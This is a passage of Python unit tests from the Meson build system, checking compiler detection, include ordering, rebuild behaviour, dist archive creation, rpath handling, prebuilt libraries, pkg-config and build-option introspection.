self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
            raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
            os.environ[evar] = ' '.join(quote_arg(w) for w in wrappercc)
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
            os.environ['AR'] = ' '.join(quote_arg(w) for w in wrapperlinker)
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
            env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
        # Changing mtime of libfile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
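        '''Create a minimal subproject containing only a project() call and
        return its path.'''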
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
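        '''Shared implementation for the dist tests: create a throwaway
        project under the given VCS and verify the generated archives.'''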
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
                self.assertIsNone(rpath)
def test_dash_d_dedup(self):
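        '''Test that repeated -D/"/D" define arguments are kept as separate
        arguments in the compiler command line.'''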
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
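        '''Detect the host C compiler, static linker, and the platform's
        object and shared-library suffixes for the prebuilt-artifact tests.'''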
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
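        '''Compile a single source file to an object file, using MSVC-style
        or Unix-style arguments depending on the compiler.'''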
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
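        '''Compile a source file and archive the resulting object into a
        static library using the detected static linker.'''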
if extra_args is None:
extra_args = []
        # The archive command is built from the detected static linker so that
        # both `ar` and MSVC's `lib` are handled without hard-coding either tool.
        link_cmd = linker.get_exelist()
        link_cmd += linker.get_always_args()
        link_cmd += linker.get_std_link_args()
        link_cmd += linker.get_output_args(outfile)
        link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
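        '''Compile a source file and link it into a shared library, handling
        the MSVC and Unix linking conventions separately.'''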
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
        Test that we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
        since system libraries such as -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
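        '''Assert that the introspected build option `name` has the given
        value.'''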
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
